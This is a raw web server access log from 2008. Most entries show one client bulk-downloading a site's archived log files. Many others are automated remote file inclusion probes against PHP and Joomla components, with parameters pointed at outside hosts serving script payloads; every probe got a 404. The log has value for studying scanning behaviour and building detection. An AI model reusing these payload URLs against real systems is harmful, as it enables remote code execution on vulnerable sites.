216.106.188.114 - - [16/Mar/2008:05:48:37 -0700] "GET /logs/access_070711.log HTTP/1.1" 200 43580 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:38 -0700] "GET /logs/access_070712.log HTTP/1.1" 200 114624 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:42 -0700] "GET /logs/access_070713.log HTTP/1.1" 200 67092 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:43 -0700] "GET /logs/access_070714.log HTTP/1.1" 200 51386 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:45 -0700] "GET /logs/access_070715.log HTTP/1.1" 200 115427 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:47 -0700] "GET /logs/access_070716.log HTTP/1.1" 200 34661 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:48 -0700] "GET /logs/access_070717.log HTTP/1.1" 200 2718 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:48 -0700] "GET /logs/access_070718.log HTTP/1.1" 200 45557 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:50 -0700] "GET /logs/access_070719.log HTTP/1.1" 200 50682 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:52 -0700] "GET /logs/access_070720.log HTTP/1.1" 200 29646 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:53 -0700] "GET /logs/access_070721.log HTTP/1.1" 200 23814 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:54 -0700] "GET /logs/access_070722.log HTTP/1.1" 200 78392 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:57 -0700] "GET /logs/access_070723.log HTTP/1.1" 200 7507 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:48:57 -0700] "GET /logs/access_070724.log HTTP/1.1" 200 173704 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:02 -0700] "GET /logs/access_070725.log HTTP/1.1" 200 66166 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:05 -0700] "GET /logs/access_070726.log HTTP/1.1" 200 41609 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:06 -0700] "GET /logs/access_070727.log HTTP/1.1" 200 35863 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:08 -0700] "GET /logs/access_070728.log HTTP/1.1" 200 41969 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:09 -0700] "GET /logs/access_070729.log HTTP/1.1" 200 26979 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:10 -0700] "GET /logs/access_070730.log HTTP/1.1" 200 41451 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:11 -0700] "GET /logs/access_070731.log HTTP/1.1" 200 34839 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:12 -0700] "GET /logs/access_070801.log HTTP/1.1" 200 22773 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:14 -0700] "GET /logs/access_070802.log HTTP/1.1" 200 35303 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:15 -0700] "GET /logs/access_070803.log HTTP/1.1" 200 56048 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:17 -0700] "GET /logs/access_070804.log HTTP/1.1" 200 28778 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:17 -0700] "GET /logs/access_070805.log HTTP/1.1" 200 30484 "-" "Java/1.4.1_04" "dmulk.com"
213.239.175.35 - - [16/Mar/2008:05:49:18 -0700] "GET /logs/access_080118.log///init_basic.php?GALLERY_BASEDIR=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.239.175.35 - - [16/Mar/2008:05:49:18 -0700] "GET ///init_basic.php?GALLERY_BASEDIR=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.239.175.35 - - [16/Mar/2008:05:49:19 -0700] "GET /logs///init_basic.php?GALLERY_BASEDIR=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:19 -0700] "GET /logs/access_070806.log HTTP/1.1" 200 23344 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:20 -0700] "GET /logs/access_070807.log HTTP/1.1" 200 47717 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:22 -0700] "GET /logs/access_070808.log HTTP/1.1" 200 84948 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:24 -0700] "GET /logs/access_070809.log HTTP/1.1" 200 38136 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:25 -0700] "GET /logs/access_070810.log HTTP/1.1" 200 58508 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:26 -0700] "GET /logs/access_070811.log HTTP/1.1" 200 94297 "-" "Java/1.4.1_04" "dmulk.com"
213.193.222.176 - - [16/Mar/2008:05:49:27 -0700] "GET /logs/access_080215.log/convert/mvcw.php?step=1&vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:05:49:28 -0700] "GET /logs/access_080215.log/convert/mvcw.php?step=1&vwar_root=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:35 -0700] "GET /logs/access_070812.log HTTP/1.1" 200 37724 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:36 -0700] "GET /logs/access_070813.log HTTP/1.1" 200 98487 "-" "Java/1.4.1_04" "dmulk.com"
88.84.148.43 - - [16/Mar/2008:05:49:38 -0700] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://course-notes.org/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
88.84.148.43 - - [16/Mar/2008:05:49:38 -0700] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://course-notes.org/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:38 -0700] "GET /logs/access_070814.log HTTP/1.1" 200 55888 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:42 -0700] "GET /logs/access_070815.log HTTP/1.1" 200 31884 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:43 -0700] "GET /logs/access_070816.log HTTP/1.1" 200 48263 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:46 -0700] "GET /logs/access_070817.log HTTP/1.1" 200 59720 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:47 -0700] "GET /logs/access_070818.log HTTP/1.1" 200 36125 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:48 -0700] "GET /logs/access_070819.log HTTP/1.1" 200 28182 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:50 -0700] "GET /logs/access_070820.log HTTP/1.1" 200 55005 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:52 -0700] "GET /logs/access_070821.log HTTP/1.1" 200 64221 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:54 -0700] "GET /logs/access_070822.log HTTP/1.1" 200 49732 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:49:57 -0700] "GET /logs/access_070823.log HTTP/1.1" 200 56843 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:00 -0700] "GET /logs/access_070824.log HTTP/1.1" 200 40957 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:02 -0700] "GET /logs/access_070825.log HTTP/1.1" 200 82596 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:06 -0700] "GET /logs/access_070826.log HTTP/1.1" 200 50531 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:07 -0700] "GET /logs/access_070827.log HTTP/1.1" 200 214217 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:14 -0700] "GET /logs/access_070828.log HTTP/1.1" 200 86379 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:17 -0700] "GET /logs/access_070829.log HTTP/1.1" 200 34921 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:19 -0700] "GET /logs/access_070830.log HTTP/1.1" 200 30370 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:20 -0700] "GET /logs/access_070831.log HTTP/1.1" 200 35113 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:24 -0700] "GET /logs/access_070901.log HTTP/1.1" 200 28607 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:25 -0700] "GET /logs/access_070902.log HTTP/1.1" 200 22717 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:26 -0700] "GET /logs/access_070903.log HTTP/1.1" 200 12137 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:26 -0700] "GET /logs/access_070904.log HTTP/1.1" 200 30421 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:27 -0700] "GET /logs/access_070905.log HTTP/1.1" 200 42196 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:29 -0700] "GET /logs/access_070906.log HTTP/1.1" 200 32974 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:30 -0700] "GET /logs/access_070907.log HTTP/1.1" 200 61100 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:31 -0700] "GET /logs/access_070908.log HTTP/1.1" 200 91498 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:34 -0700] "GET /logs/access_070909.log HTTP/1.1" 200 75478 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:39 -0700] "GET /logs/access_070910.log HTTP/1.1" 200 50863 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:41 -0700] "GET /logs/access_070911.log HTTP/1.1" 200 86699 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:43 -0700] "GET /logs/access_070912.log HTTP/1.1" 200 65147 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:45 -0700] "GET /logs/access_070913.log HTTP/1.1" 200 105654 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:48 -0700] "GET /logs/access_070914.log HTTP/1.1" 200 86919 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:51 -0700] "GET /logs/access_070915.log HTTP/1.1" 200 65779 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:53 -0700] "GET /logs/access_070916.log HTTP/1.1" 200 144658 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:55 -0700] "GET /logs/access_070917.log HTTP/1.1" 200 40532 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:56 -0700] "GET /logs/access_070918.log HTTP/1.1" 200 51808 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:57 -0700] "GET /logs/access_070919.log HTTP/1.1" 200 35028 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:50:59 -0700] "GET /logs/access_070920.log HTTP/1.1" 200 56600 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:51:03 -0700] "GET /logs/access_070921.log HTTP/1.1" 200 70813 "-" "Java/1.4.1_04" "dmulk.com"
212.79.236.170 - - [16/Mar/2008:05:51:04 -0700] "GET /index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://www.congressovirtualmgf.com/includes/js/calendar/lang/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:51:05 -0700] "GET /logs/access_070922.log HTTP/1.1" 200 143145 "-" "Java/1.4.1_04" "dmulk.com"
207.210.111.98 - - [16/Mar/2008:05:51:07 -0700] "GET /logs/access_080117.log/////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hotnews.altervista.org/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.111.98 - - [16/Mar/2008:05:51:07 -0700] "GET /////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hotnews.altervista.org/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.111.98 - - [16/Mar/2008:05:51:07 -0700] "GET /logs/////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hotnews.altervista.org/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:51:09 -0700] "GET /logs/access_070923.log HTTP/1.1" 200 55220 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:51:11 -0700] "GET /logs/access_070924.log HTTP/1.1" 200 106285 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:51:15 -0700] "GET /logs/access_070925.log HTTP/1.1" 200 516 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:51:16 -0700] "GET /logs/access_070926.log HTTP/1.1" 200 34093 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:51:17 -0700] "GET /logs/access_070927.log HTTP/1.1" 200 42324 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:51:19 -0700] "GET /logs/access_070928.log HTTP/1.1" 200 16581 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:51:20 -0700] "GET /logs/access_070929.log HTTP/1.1" 200 98605 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:51:23 -0700] "GET /logs/access_070930.log HTTP/1.1" 200 32172 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:51:24 -0700] "GET /logs/access_071001.log HTTP/1.1" 200 33494 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:51:24 -0700] "GET /logs/access_071002.log HTTP/1.1" 200 70737 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:51:26 -0700] "GET /logs/access_071003.log HTTP/1.1" 200 36511 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:51:27 -0700] "GET /logs/access_071004.log HTTP/1.1" 200 70439 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:51:30 -0700] "GET /logs/access_071005.log HTTP/1.1" 200 49825 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:51:31 -0700] "GET /logs/access_071006.log HTTP/1.1" 200 58327 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:51:33 -0700] "GET /logs/access_071007.log HTTP/1.1" 200 56320 "-" "Java/1.4.1_04" "dmulk.com"
72.30.214.232 - - [16/Mar/2008:05:51:35 -0700] "GET /logs/access_080120.log HTTP/1.0" 200 585838 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:51:35 -0700] "GET /logs/access_071008.log HTTP/1.1" 200 53442 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:51:38 -0700] "GET /logs/access_071009.log HTTP/1.1" 200 26112 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:51:40 -0700] "GET /logs/access_071010.log HTTP/1.1" 200 39814 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:51:41 -0700] "GET /logs/access_071011.log HTTP/1.1" 200 23938 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:51:42 -0700] "GET /logs/access_071012.log HTTP/1.1" 200 75692 "-" "Java/1.4.1_04" "dmulk.com"
216.106.188.114 - - [16/Mar/2008:05:51:43 -0700] "GET /logs/access_071013.log HTTP/1.1" 200 46816 "-" "Java/1.4.1_04" "dmulk.com"
218.150.160.162 - - [16/Mar/2008:05:51:45 -0700] "GET /logs/access_080215.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.58.242.138 - - [16/Mar/2008:05:51:54 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [16/Mar/2008:05:51:54 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [16/Mar/2008:05:51:55 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.142.220.82 - - [16/Mar/2008:05:53:00 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://fulls.iespana.es/testir.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
202.142.220.82 - - [16/Mar/2008:05:53:00 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://fulls.iespana.es/testir.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
63.147.134.12 - - [16/Mar/2008:05:53:24 -0700] "GET /logs/access_080225.log/index2.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.147.134.12 - - [16/Mar/2008:05:53:24 -0700] "GET /logs/index2.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.218.53.244 - - [16/Mar/2008:05:53:32 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
72.218.53.244 - - [16/Mar/2008:05:53:32 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
72.218.53.244 - - [16/Mar/2008:05:53:33 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.etclan.eu/downloads/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
72.218.53.244 - - [16/Mar/2008:05:53:33 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://fulls.iespana.es/testir.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
72.218.53.244 - - [16/Mar/2008:05:53:33 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.etclan.eu/downloads/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
72.218.53.244 - - [16/Mar/2008:05:53:33 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://fulls.iespana.es/testir.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
213.83.30.6 - - [16/Mar/2008:05:54:10 -0700] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://animeswan.com/includes/idscan2? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.83.30.6 - - [16/Mar/2008:05:54:10 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://animeswan.com/includes/idscan2? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.79.236.170 - - [16/Mar/2008:05:54:37 -0700] "GET /logs/access_080118.log/index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://www.congressovirtualmgf.com/includes/js/calendar/lang/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.79.236.170 - - [16/Mar/2008:05:54:37 -0700] "GET /logs/index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://www.congressovirtualmgf.com/includes/js/calendar/lang/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
207.210.111.98 - - [16/Mar/2008:05:55:05 -0700] "GET /logs/access_080124.log/////index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hotnews.altervista.org/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.134.252.23 - - [16/Mar/2008:05:55:38 -0700] "GET /components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://h1.ripway.com/perusak/x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.147.134.12 - - [16/Mar/2008:05:55:54 -0700] "GET /logs/access_080204.log/index2.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.83.30.6 - - [16/Mar/2008:05:56:32 -0700] "GET /logs/access_071219.log//classes/adodbt/sql.php?classes_dir=http://animeswan.com/includes/idscan2? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.93.48.162 - - [16/Mar/2008:05:57:16 -0700] "GET /logs/access_080126.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [16/Mar/2008:05:57:16 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [16/Mar/2008:05:57:16 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:05:57:57 -0700] "GET /logs/access_080228.log//components/com_simpleboard/image_upload.php?sbp=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:05:57:58 -0700] "GET /logs/access_080228.log//components/com_simpleboard/image_upload.php?sbp=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:05:57:58 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:05:57:59 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.48.162 - - [16/Mar/2008:05:58:47 -0700] "GET /logs/access_080228.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
82.165.243.117 - - [16/Mar/2008:05:59:29 -0700] "GET /logs/access_080131.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.165.243.117 - - [16/Mar/2008:05:59:29 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.165.243.117 - - [16/Mar/2008:05:59:29 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.165.243.117 - - [16/Mar/2008:05:59:35 -0700] "GET /logs/access_080124.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.85.201.66 - - [16/Mar/2008:05:59:59 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://naninhavv.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.201.66 - - [16/Mar/2008:05:59:59 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://naninhavv.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.201.66 - - [16/Mar/2008:05:59:59 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://naninhavv.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.48.162 - - [16/Mar/2008:06:00:04 -0700] "GET /logs/access_080215.log/mcf.php?content=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [16/Mar/2008:06:00:04 -0700] "GET /mcf.php?content=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [16/Mar/2008:06:00:05 -0700] "GET /logs/mcf.php?content=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
